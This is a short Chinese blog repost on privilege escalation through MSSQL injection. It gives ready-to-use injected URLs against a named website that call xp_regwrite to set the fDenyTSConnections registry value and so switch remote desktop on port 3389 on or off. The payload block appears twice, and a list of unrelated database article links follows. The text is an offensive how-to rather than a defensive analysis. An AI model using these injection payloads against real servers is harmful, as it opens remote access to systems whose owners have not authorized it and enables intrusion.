提权【SQL语句直接开启3389】
2015-10-31 11:04
337 查看
3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections
其中键值DenyTSConnections 直接控制着3389的开启和关闭,当该键值为0表示3389开启,1则表示关闭。
而MSSQL的xp_regwrite的存储过程可以对注册进行修改,我们使用这点就可以简单的修改DenyTSConnections键值,从而控制3389的关闭和开启。
开启3389的SQL语句:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal Server’,’fDenyTSConnections’,’REG_DWORD’,0;–
关闭3389的SQL语句:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal Server’,’fDenyTSConnections’,’REG_DWORD’,1;– https://www.70sec.com/thread-3007-1-1.html
其中键值DenyTSConnections 直接控制着3389的开启和关闭,当该键值为0表示3389开启,1则表示关闭。
而MSSQL的xp_regwrite的存储过程可以对注册进行修改,我们使用这点就可以简单的修改DenyTSConnections键值,从而控制3389的关闭和开启。
开启3389的SQL语句:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal Server’,’fDenyTSConnections’,’REG_DWORD’,0;–
关闭3389的SQL语句:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal Server’,’fDenyTSConnections’,’REG_DWORD’,1;– https://www.70sec.com/thread-3007-1-1.html
相关文章推荐
- 导数中的最小化日志记录:背景和理论
- 关于oracle数据库的隐式转换的操作
- oracle用户,权限,表空间管理
- SQLite使用技巧
- 你真的会玩SQL吗?让人晕头转向的三值逻辑
- MyDNS-ng + mysql + MyDNSConfig(Web管理)
- Winform中的Treeview动态绑定数据库
- Oracle数据库零散知识05 -- 表创建,修改
- Dom4j+PLSQL XML文件导入数据库
- Oracle之内存结构(SGA、PGA)
- Liunux下安装oracle客户端
- 配置sql server 2008镜像服务
- DB字段顺序与类的属性顺序一致:{Oracle.DataAccess.Client.OracleException ORA-00932: 数据类型不一致: 应为 TIMESTAMP, 但却获得 NUMBER
- (转)一网打尽当下NoSQL类型、适用场景及使用公司
- MongoDB高级查询详细
- SQL Server: T-SQL变量声明陷阱
- mysql导出为CSV的同时加上表头
- [实战]MVC5+EF6+MySql企业网盘实战(10)——新建文件夹
- mysql 查看死锁和去除死锁
- SQL Server 2014 版 DISTINCT和Order BY的错误